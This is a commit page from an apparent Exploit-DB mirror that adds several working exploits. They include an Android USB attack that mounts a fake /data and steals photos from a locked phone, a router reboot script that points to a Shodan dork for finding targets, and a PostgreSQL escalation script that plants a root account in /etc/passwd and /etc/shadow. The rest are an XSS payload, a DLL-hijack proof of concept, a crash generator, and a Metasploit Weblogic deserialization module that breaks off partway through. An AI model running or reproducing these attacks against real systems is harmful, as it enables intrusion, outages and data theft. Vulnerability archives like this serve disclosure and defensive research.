bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-08-14

Browse source 
11 changes to exploits/shellcodes

IP Finder 1.5 - Denial of Service (PoC)
Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)
PLC Wireless Router GPN2.4P21-C-CN - Denial of Service
Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow
PostgreSQL 9.4-0.5.3 - Privilege Escalation
Android - Directory Traversal over USB via Injection in blkid Output

Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution

Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)

Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)

IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting

Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)
This commit is contained in:
Offensive Security 2018-08-14 05:01:45 +00:00
parent e5c23cdd53
commit 1e34c2b6a5
13 changed files with 1118 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

347
exploits/android/local/45192.txt Normal file
View file

@ -0,0 +1,347 @@
When a USB mass storage device is inserted into an Android phone (even if the
phone is locked!), vold will attempt to automatically mount partitions from the
inserted device. For this purpose, vold has to identify the partitions on the
connected device and collect some information about them, which is done in
readMetadata() in system/vold/Utils.cpp. This function calls out to "blkid",
then attempts to parse the results:
std::vector<std::string> cmd;
cmd.push_back(kBlkidPath);
cmd.push_back("-c");
cmd.push_back("/dev/null");
cmd.push_back("-s");
cmd.push_back("TYPE");
cmd.push_back("-s");
cmd.push_back("UUID");
cmd.push_back("-s");
cmd.push_back("LABEL");
cmd.push_back(path);
std::vector<std::string> output;
status_t res = ForkExecvp(cmd, output, untrusted ? sBlkidUntrustedContext : sBlkidContext);
if (res != OK) {
LOG(WARNING) << "blkid failed to identify " << path;
return res;
}
char value[128];
for (const auto& line : output) {
// Extract values from blkid output, if defined
const char* cline = line.c_str();
const char* start = strstr(cline, "TYPE=");
if (start != nullptr && sscanf(start + 5, "\"%127[^\"]\"", value) == 1) {
fsType = value;
}
start = strstr(cline, "UUID=");
if (start != nullptr && sscanf(start + 5, "\"%127[^\"]\"", value) == 1) {
fsUuid = value;
}
start = strstr(cline, "LABEL=");
if (start != nullptr && sscanf(start + 6, "\"%127[^\"]\"", value) == 1) {
fsLabel = value;
}
}
Normally, the UUID string can't contain any special characters because blkid
generates it by reformatting a binary ID as a printable UUID string. However,
the version of blkid that Android is using will print the LABEL first, without
escaping the characters this code scans for, allowing an attacker to place
special characters in the fsUuid variable.
For example, if you format a USB stick with a single partition, then place a
romfs filesystem in the partition as follows (on the terminal of a Linux PC):
# echo '-rom1fs-########TYPE="vfat" UUID="../../data"' > /dev/sdc1
and then connect the USB stick to a Nexus 5X and run blkid as root on the
device, you'll see the injection:
bullhead:/ # blkid -c /dev/null -s TYPE -s UUID -s LABEL /dev/block/sda1
/dev/block/sda1: LABEL="TYPE="vfat" UUID="../../data"" TYPE="romfs"
logcat shows that the injection was successful and the device is indeed using
the injected values, but vold doesn't end up doing much with the fake UUID
because fsck_msdos fails:
05-29 20:41:26.262 391 398 V vold : /dev/block/vold/public:8,1: LABEL="TYPE="vfat" UUID="../../data"" TYPE="romfs"
05-29 20:41:26.262 391 398 V vold :
05-29 20:41:26.263 391 398 V vold : /system/bin/fsck_msdos
05-29 20:41:26.263 391 398 V vold : -p
05-29 20:41:26.263 391 398 V vold : -f
05-29 20:41:26.263 391 398 V vold : /dev/block/vold/public:8,1
05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {652 public:8,1 vfat}
05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {653 public:8,1 ../../data}
05-29 20:41:26.265 813 2039 D VoldConnector: RCV <- {654 public:8,1 TYPE=}
05-29 20:41:26.281 391 398 I fsck_msdos: ** /dev/block/vold/public:8,1
05-29 20:41:26.285 391 398 I fsck_msdos: Invalid sector size: 8995
05-29 20:41:26.286 391 398 I fsck_msdos: fsck_msdos terminated by exit(8)
05-29 20:41:26.286 391 398 E Vold : Filesystem check failed (no filesystem)
05-29 20:41:26.286 391 398 E vold : public:8,1 failed filesystem check
05-29 20:41:26.286 813 2039 D VoldConnector: RCV <- {651 public:8,1 6}
05-29 20:41:26.287 813 2039 D VoldConnector: RCV <- {400 48 Command failed}
05-29 20:41:26.288 2532 2532 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,1}:
05-29 20:41:26.288 2532 2532 D StorageNotification: type=PUBLIC diskId=disk:8,0 partGuid=null mountFlags=0 mountUserId=0
05-29 20:41:26.288 2532 2532 D StorageNotification: state=UNMOUNTABLE
05-29 20:41:26.288 2532 2532 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE=
05-29 20:41:26.288 2532 2532 D StorageNotification: path=null internalPath=null
For a relatively harmless example in which vold actually ends up mounting the
device in the wrong place, you can create a vfat partition with label
'UUID="../##':
# mkfs.vfat -n 'PLACEHOLDER' /dev/sdc1
mkfs.fat 4.1 (2017-01-24)
# dd if=/dev/sdc1 bs=1M count=200 | sed 's|PLACEHOLDER|UUID="../##|g' | dd of=/dev/sdc1 bs=1M
200+0 records in
200+0 records out
209715200 bytes (210 MB, 200 MiB) copied, 1.28705 s, 163 MB/s
198+279 records in
198+279 records out
209715200 bytes (210 MB, 200 MiB) copied, 2.60181 s, 80.6 MB/s
Connect it to the Android device again while running strace against vold:
[pid 398] newfstatat(AT_FDCWD, "/mnt/media_rw/../##", 0x7d935fe708, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory)
[pid 398] mkdirat(AT_FDCWD, "/mnt/media_rw/../##", 0700) = 0
[pid 398] fchmodat(AT_FDCWD, "/mnt/media_rw/../##", 0700) = 0
[pid 398] fchownat(AT_FDCWD, "/mnt/media_rw/../##", 0, 0, 0) = 0
[pid 398] mount("/dev/block/vold/public:8,1", "/mnt/media_rw/../##", "vfat", MS_NOSUID|MS_NODEV|MS_NOEXEC|MS_DIRSYNC|MS_NOATIME, "utf8,uid=1023,gid=1023,fmask=7,d"...) = 0
[pid 398] faccessat(AT_FDCWD, "/mnt/media_rw/../##/LOST.DIR", F_OK) = -1 ENOENT (No such file or directory)
[pid 398] mkdirat(AT_FDCWD, "/mnt/media_rw/../##/LOST.DIR", 0755) = 0
Check the results:
bullhead:/ # ls -l /mnt
total 32
drwxrwx--- 3 media_rw media_rw 32768 2018-05-29 20:54 ##
drwx--x--x 2 root root 40 1970-01-01 04:14 appfuse
drwxr-xr-x 2 root system 40 1970-01-01 04:14 asec
drwxrwx--x 2 system system 40 1970-01-01 04:14 expand
drwxr-x--- 2 root media_rw 40 1970-01-01 04:14 media_rw
drwxr-xr-x 2 root system 40 1970-01-01 04:14 obb
drwx------ 5 root root 100 1970-01-01 04:14 runtime
lrwxrwxrwx 1 root root 21 1970-01-01 04:14 sdcard -> /storage/self/primary
drwx------ 3 root root 60 1970-01-01 04:14 secure
drwxr-xr-x 3 root root 60 1970-01-01 04:14 user
bullhead:/ # mount | grep '##'
/dev/block/vold/public:8,1 on /mnt/## type vfat (rw,dirsync,nosuid,nodev,noexec,noatime,uid=1023,gid=1023,fmask=0007,dmask=0007,allow_utime=0020,codepage=437,iocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro)
When testing with a normal USB stick, the attacker has to choose between using a
vfat filesystem (so that Android is capable of mounting it as external storage)
and using a romfs filesystem (so that the label is long enough to specify
arbitrary paths). However, an attacker who wants to perform more harmful attacks
could use a malicious USB storage device that is capable of delivering different
data for multiple reads from the same location. This way, it would be possible
to deliver a romfs superblock when blkfs is reading, but deliver a vfat
superblock when the kernel is reading. I haven't tested this yet because I don't
yet have the necessary hardware.
When you fix this issue, please don't just fix the injection and/or the
directory traversal. I believe that from a security perspective, a smartphone
should not mount storage devices that are inserted while the screen is locked
(or, more generally, communication with new USB devices should be limited while
the screen is locked). Mounting a USB storage device exposes a lot of code to
the connected device, including partition table parsing, vold logic, blkid, the
kernel's FAT filesystem implementation, and anything on the device that might
decide to read files from the connected storage device.
############################################################
This is a PoC for stealing photos from the DCIM folder of a Pixel 2 running
build OPM2.171026.006.C1 while the device is locked. You will need a Pixel 2 as
victim device, a corresponding AOSP build tree, a Raspberry Pi Zero W (or some
other device you can use for device mode USB), a powered USB hub, and some
cables.
The victim phone must be powered on, the disk encryption keys must be unlocked
(meaning that you must have entered your PIN/passphrase at least once since
boot), and the attack probably won't work if someone has recently (since the
last reboot) inserted a USB stick into the phone.
Configure the Raspberry Pi Zero W such that it is usable for gadget mode
(see e.g. https://gist.github.com/gbaman/50b6cca61dd1c3f88f41).
Apply the following patch to frameworks/base in your AOSP build tree:
=========================================
diff --git a/packages/ExternalStorageProvider./src/com/android/externalstorage/MountReceiver.java b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java
index 8a6c7d68525..73be5818da1 100644
--- a/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java
+++ b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java
@@ -20,10 +20,38 @@ import android.content.BroadcastReceiver;
import android.content.ContentProviderClient;
import android.content.Context;
import android.content.Intent;
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
public class MountReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
+ System.logE("MOUNTRECEIVER CODE INJECTED, GRABBING FILES...");
+ try {
+ File exfiltration_dir = new File("/data/exfiltrated-photos");
+ exfiltration_dir.mkdir();
+ File camera_dir = new File("/storage/emulated/0/DCIM/Camera");
+ File[] camera_files = camera_dir.listFiles();
+ for (File camera_file: camera_files) {
+ System.logE("GRABBING '"+camera_file.getName()+"'");
+ File exfiltrated_file = new File(exfiltration_dir, camera_file.getName());
+ exfiltrated_file.delete();
+ FileInputStream ins = new FileInputStream(camera_file);
+ FileOutputStream outs = new FileOutputStream(exfiltrated_file);
+ byte[] buf = new byte[4096];
+ int len;
+ while ((len=ins.read(buf)) > 0) {
+ outs.write(buf, 0, len);
+ }
+ ins.close();
+ outs.close();
+ }
+ } catch (Exception e) {
+ throw new RuntimeException(e);
+ }
+ System.logE("INJECTED CODE DONE");
+
final ContentProviderClient client = context.getContentResolver()
.acquireContentProviderClient(ExternalStorageProvider.AUTHORITY);
try {
=========================================
Then build the tree ("lunch aosp_walleye-userdebug", then build with "make").
Zip the classes.dex build artifact of ExternalStorageProvider:
$ zip -jX zipped_dexfile ~/aosp-walleye/out/target/common/obj/APPS/ExternalStorageProvider_intermediates/classes.dex
adding: classes.dex (deflated 49%)
$ mv zipped_dexfile.zip zipped_dexfile
Download the factory image for OPM2.171026.006.C1 and unpack its system partition, e.g. using commands roughly as follows:
$ unzip image-walleye-opm2.171026.006.c1.zip
$ ~/aosp-walleye/out/host/linux-x86/bin/simg2img system.img system.img.raw # convert sparse image to normal
$ echo 'rdump / walleye-opm2.171026.006.c1/unpacked_system/' | debugfs -f- walleye-opm2.171026.006.c1/unpacked_image/system.img.raw 2>/dev/null # extract filesystem image
Now build the classes.dex build artifact into an odex file and a vdex file, linking against boot.art from the factory image:
$ ~/aosp-walleye/out/host/linux-x86/bin/dex2oat --runtime-arg -Xms64m --runtime-arg -Xmx512m --class-loader-context='&' --boot-image=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/framework/boot.art --dex-file=zipped_dexfile --dex-location=/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk --oat-file=package.odex --android-root=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system --instruction-set=arm64 --instruction-set-variant=cortex-a73 --instruction-set-features=default --runtime-arg -Xnorelocate --compile-pic --no-generate-debug-info --generate-build-id --abort-on-hard-verifier-error --force-determinism --no-inline-from=core-oj.jar --compiler-filter=quicken
The resulting vdex file would not be accepted by the phone because of a CRC32
checksum mismatch; to fix it up, compile the attached vdex_crc32_fixup.c and use
it to overwrite the CRC32 checksum with the expected one from the factory image:
$ ./vdex_crc32_fixup package.vdex ~/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk
original crc32: d0473780
new crc32: 84c10ae9
vdex patched
Prepare two disk images, each with a MBR partition table and a single partition.
Their partition tables should be identical.
In the first image's partition, place a fake romfs filesystem that triggers the
vold bug:
# echo -e '-rom1fs-########TYPE="vfat" UUID="../../data"\0' > /dev/sdd1
Format the second image's partition with FAT32, and create the following
directory structure inside that filesystem (the "system@" entries are files, the
rest are directories):
├── dalvik-cache
│ └── arm64
│ ├── system@framework@boot.art
│ ├── system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex
│ └── system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex
├── LOST.DIR
├── misc
│ └── profiles
│ └── cur
│ └── 0
│ └── com.android.externalstorage
├── user
│ └── 0
│ └── com.android.externalstorage
│ └── cache
└── user_de
└── 0
└── com.android.externalstorage
└── code_cache
The three system@ files should have the following contents:
- system@framework@boot.art should be a copy of system/framework/arm64/boot.art
from the system image.
- system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex
should be the generated package.odex.
- system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex
should be the fixed-up package.vdex.
Copy the two disk images to the Raspberry Pi Zero W; the fake romfs image should
be named "disk_image_blkid", the image with FAT32 should be named
"disk_image_mount". On the Pi, build the fuse_intercept helper:
$ gcc -Wall fuse_intercept.c `pkg-config fuse --cflags --libs` -o fuse_intercept
Then create a directory "mount" and launch fuse_intercept.
In a second terminal, tell the Pi's kernel to present the contents of the mount
point as a mass storage device:
pi@raspberrypi:~ $ sudo modprobe dwc2
pi@raspberrypi:~ $ sudo modprobe g_mass_storage file=/home/pi/mount/wrapped_image stall=0
To run the attack, connect the Pi to the powered USB hub as a device. Then use
a USB-C OTG adapter (unless you have some fancy USB-C hub, I guess?) to connect
the powered hub to the locked phone, with the phone in USB host mode.
At this point, the phone should first mount the USB stick over
/data, then immediately afterwards launch
com.android.externalstorage/.MountReceiver:
06-05 21:58:20.988 656 665 I Vold : Filesystem check completed OK
06-05 21:58:20.988 1115 1235 D VoldConnector: RCV <- {656 public:8,97 /mnt/media_rw/../../data}
06-05 21:58:20.990 1115 1235 D VoldConnector: RCV <- {655 public:8,97 /mnt/media_rw/../../data}
06-05 21:58:21.004 1115 1235 D VoldConnector: RCV <- {651 public:8,97 2}
06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:33): avc: denied { write } for name="/" dev="sdg1" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0
06-05 21:58:21.006 1115 1235 D VoldConnector: RCV <- {200 7 Command succeeded}
06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:34): avc: denied { write } for name="/" dev="sdg1" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0
06-05 21:58:21.008 1335 1335 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,97}:
06-05 21:58:21.008 1335 1335 D StorageNotification: type=PUBLIC diskId=disk:8,96 partGuid=null mountFlags=0 mountUserId=0
06-05 21:58:21.008 1335 1335 D StorageNotification: state=MOUNTED
06-05 21:58:21.008 1335 1335 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE=
06-05 21:58:21.008 1335 1335 D StorageNotification: path=/mnt/media_rw/../../data internalPath=/mnt/media_rw/../../data
06-05 21:58:21.020 1115 1129 I ActivityManager: Start proc 4478:com.android.externalstorage/u0a35 for broadcast com.android.externalstorage/.MountReceiver
Most processes can't access the vfat filesystem that is now mounted at /data
either because they lack the necessary groups or because of some SELinux rule.
But com.android.externalstorage passes both checks and can read and write (but
not execute) files from the new /data. Bytecode is loaded from
/data/dalvik-cache/arm64/system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex
and then interpreted, allowing the attacker to steal photos from the device
(since com.android.externalstorage has access to /storage/emulated/0):
06-05 21:58:21.248 4478 4478 I zygote64: The ClassLoaderContext is a special shared library.
06-05 21:58:21.276 4478 4478 W zygote64: JIT profile information will not be recorded: profile file does not exits.
06-05 21:58:21.278 4478 4478 W asset : failed to open idmap file /data/resource-cache/vendor@overlay@Pixel@PixelThemeOverlay.apk@idmap
06-05 21:58:21.326 4478 4478 D ExternalStorage: After updating volumes, found 3 active roots
06-05 21:58:21.334 4478 4478 E System : MOUNTRECEIVER CODE INJECTED, GRABBING FILES...
06-05 21:58:21.343 4478 4478 E System : GRABBING 'IMG_20180605_212044.jpg'
06-05 21:58:21.419 4478 4478 E System : GRABBING 'IMG_20180605_215031.jpg'
06-05 21:58:21.428 2218 2218 W SQLiteLog: (28) file renamed while open: /data/user/0/com.google.android.gms/databases/config.db
06-05 21:58:21.465 4478 4478 E System : INJECTED CODE DONE
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip

26
exploits/hardware/dos/45187.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot
# Date: 8/12/2018
# Exploit Author: Chris Rose
# Affected Model : GPN2.4P21-C-CN(Firmware: W2001EN-00)
# Vendor: ChinaMobile
# Tested on: Debian Linux
# Shodan dork- title:PLC
# CVE: None
#Description: PLC Wireless Router's are vulnerable to a unauthenticated remote reboot
# which can be achieved through sending a modified http request. The script below will
# take a user suppled IP address of a PLC router and send the exploit to the device.# Use the Shodan dork above to find PLC wireless routers.
import requests
import time
target = raw_input("Enter target IP: ")
post_data = {'reboot' : 'Reboot', 'obj-action' : 'reboot', 'var%3Anoredirect' : '1', 'var%3Amenu' : 'maintenance', 'var%3Apage' : 'system', 'var%3Aerrorpage' : 'system', 'getpage' : 'html%2Fpage%2Frestarting.html'}
exploit = requests.post("http://"+target+":8080/cgi-bin/webproc", data=post_data)
print ("Sent exploit attempt to %s")% target
time.sleep(1.2)
print ("Test if device is offline.")
time.sleep(1.5)
print ("Visit http://"+target+":8080/")

55
exploits/linux/local/45184.sh Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: PostgreSQL 9.4-0.5.3 - Privilege Escalation
# Date: 2017-10-11
# Exploit Author: Johannes Segitz
# Vendor Homepage: https://bugzilla.suse.com/show_bug.cgi?id=1062722
# Software Link: -
# Version: Before postgresql-init-9.4-0.5.3.1
# Tested on: SUSE Linux Enterprise 11 SP4
# CVE : CVE-2017-14798
#!/bin/sh
# don't use spaces or other funny characters in here
CRON_DIR='/etc/cron.hourly'
CRON_FILE="$CRON_DIR/totally_not_a_lpe"
declare -a CLEANUP_ELEMENTS=('base' 'global' 'pg_clog' 'pg_hba.conf' 'pg_ident.conf' 'pg_multixact' 'pg_subtrans' 'pg_tblspc' 'pg_twophase' 'PG_VERSION' 'pg_xlog' 'postgresql.conf')
if [ "$(whoami)" != "postgres" ]; then
echo "Must be run as user postgres"
exit -1
fi
cd
echo setting up exploit
mv data data2
ln -s $CRON_DIR data
echo waiting for DB restart
while [ ! -w $CRON_DIR ]; do
sleep 1
done
echo able to write $CRON_DIR
echo '#!/bin/sh' > $CRON_FILE
echo 'echo '"'"'pg_root:x:0:0:,,,:/home/pg_root:/bin/bash'"'"' >> /etc/passwd' >> $CRON_FILE
echo 'echo '"'"'pg_root:$2y$05$6F6hHGfvZ42Mq1EF8V.e8uguGumaZsZ4P9qfjiuHFT/k8B2CZrJaO:16339:0:99999:7:::'"'"' >> /etc/shadow' >> $CRON_FILE
echo "rm $CRON_FILE" >> $CRON_FILE
echo "chown root.root ${CRON_DIR}" >> $CRON_FILE
chmod +x $CRON_FILE
if [ -e $CRON_FILE ]; then
echo wrote $CRON_FILE
else
echo failed to write $CRON_FILE, exiting
exit 1
fi
echo cleaning up
for i in "${CLEANUP_ELEMENTS[@]}"; do
rm -rf "$CRON_DIR/$i"
done
rm data
mv data2 data
echo now wait, depending on CRON_DIR setting you should be able to log into this system with pg_root:foobar soonish. Enjoy!

27
exploits/multiple/webapps/45190.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: [IBM Sterling B2B Integrator persistent cross-site scripting]
# Exploit Author: [Vikas Khanna] (https://www.linkedin.com/in/leetvikaskhanna/) (https://twitter.com/MR_SHANU_KHANNA)
# Vendor Homepage: [https://www.ibm.com/support/knowledgecenter/en/SS3JSW_5.2.0/com.ibm.help.overview.doc/si_overview.html]
# Version: [IBM Sterling B2B Integrator 5.2.0.1 - 5.2.6.3] (REQUIRED)
# CVE : [CVE-2018-1513 & CVE-2018-1563]
Vulnerability Details
Vulnerability Name : Persistent Cross Site Scripting
Affected Parameter(s) : fname & lname
Steps to reproduce
Step 1 : Login to the IBM Sterling B2B Integrator.
Step 2 : Navigate to Performance Tuning module, Username will be displayed as below :-
Last Edited By <USERNAME>
Note :- Modify the configuration for example and check the Last Edited By - Username. Any user (Admin or Non admin) who have privileges to change the configuration can act like an attacker.
Step 3 : Navigate to My Account and update first name and last name.
Step 4: Intercept the request using burp suite and insert the <Video><source onerror=”alert(1)”> payload & <Video><source onerror=”alert(2)”> payload in fname and lname parameter.
Step 5 : It has been observed that My account module is not vulnerable to XSS but Performance Tuning tab under Operations -> Performance is vulnerable, as the Performance Tuning tab displays the users first name and last name separately as “Last Edited By USERNAME”.
Step 6 : Now navigate to Performance Tuning module. It is seen that the application is vulnerable to Persistent Cross Site Scripting.
Note : It has been observed that any user who has access to Performance Tuning tab will be vulnerable and the same javascript payload will execute for them as well.

23
exploits/windows/dos/45186.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service (PoC)
# Discovery by: Javier Enrique Rodriguez Gutierrez
# Discovery Date : 2018-08-11
# Vendor Homepage: https://www.acunetix.com
# Tested Version : 10.0
# Vulnerability Type : Denial of Service (PoC)
# Tested on OS : Windows 10 PRO x86 en
# 1 . run python code : python generate.py
# 2 . open generate.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 10.0"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed
#!/usr/bin/env python
# -*- coding: utf-8 -*-
buffer = "\x41" * 2769
f = open ("generate.txt", "w")
f.write(buffer)
f.close()

120
exploits/windows/remote/45180.txt Normal file
View file

@ -0,0 +1,120 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DIRECTX-SDK-XACT.EXE-TROJAN-FILE-CODE-EXECUTION.txt
[+] ISR: Apparition Security
***Greetz: indoushka | Eduardo***
Vendor
=============
www.microsoft.com
Product
===========
Microsoft DirectX SDK (June 2010) Xact3.exe
https://www.microsoft.com/en-us/download/details.aspx?id=6812
XACT (Cross-platform audio creation tool) is an audio creation and authoring tool from Microsoft.
It comes with a graphical interface that allows sound designers to create audio resources for games,
that can be integrated into XNA projects, offering the game developer a convenient way of accessing these sounds.
Vulnerability Type
===================
Remote Code Execution
CVE Reference
==============
N/A
Security Issue
================
Microsoft DirectX SDK "Xact3.exe" Cross-platform tool allows for arbitrary code execution via a Trojan horse file "xbdm.dll"
in the current working directory, upon opening a ".xap" project file from same location.
The DirectX SDK deprecated but still avail for download at time of this writing ...
Exploit/POC
=============
1) create DLL 32bit DLL named "xbdm.dll" and place on a remote share
2) create an empty file with a ".xap" extension on the same share, this will open using "Xact3.exe" as its default
3) open the the .xap file from the Network share then BOOM!
#include <windows.h>
/* hyp3rlinx */
/*
gcc -c -m32 xbdm.c
gcc -shared -m32 -o xbdm.dll xbdm.o
*/
void executo(){
MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin " , MB_YESNO + MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
executo();
break;
}
case DLL_PROCESS_DETACH:{
executo();
break;
}
case DLL_THREAD_ATTACH:{
executo();
break;
}
case DLL_THREAD_DETACH:{
executo();
break;
}
}
return TRUE;
}
Network Access
===============
Remote
Severity
=========
High
Disclosure Timeline
=============================
Vendor Notification: June 7, 2018
MSRC Case 45973 : June 13, 2018
MSRC : "While your finding is valid, we wont service this issue because the legacy DirectX SDK is deprecated." : August 10, 2018
August 11, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

313
exploits/windows/remote/45193.rb Executable file
View file

@ -0,0 +1,313 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic
Server T3 interface can send a serialized object to the interface to
execute code on vulnerable hosts.
},
'Author' =>
[
'brianwrf', # EDB PoC
'Jacob Robles' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2018-2628'],
['EDB', '44553']
],
'Privileged' => false,
'Targets' =>
[
[ 'Windows',
{
'Platform' => ['win']
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'RPORT' => 7001
},
'DisclosureDate' => 'Apr 17 2018'))
end
def gen_resp
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
pwrshl.gsub!("%COMSPEC%", "cmd.exe")
tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
mycmd << tmp_dat
# Response data taken from JRMPListener generated data:
# java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
# Modified captured network traffic bytes. Patch in command to run
@resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
@resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
@resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
@resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
@resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
@resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
@resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
@resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
@resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
@resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
@resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
@resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
@resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
@resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
@resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
@resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
@resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
@resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
@resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
@resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
@resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
@resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
@resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
@resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
@resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
@resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
@resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
@resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
@resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
@resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
@resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
@resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
@resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
@resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
@resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
@resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
@resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
@resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
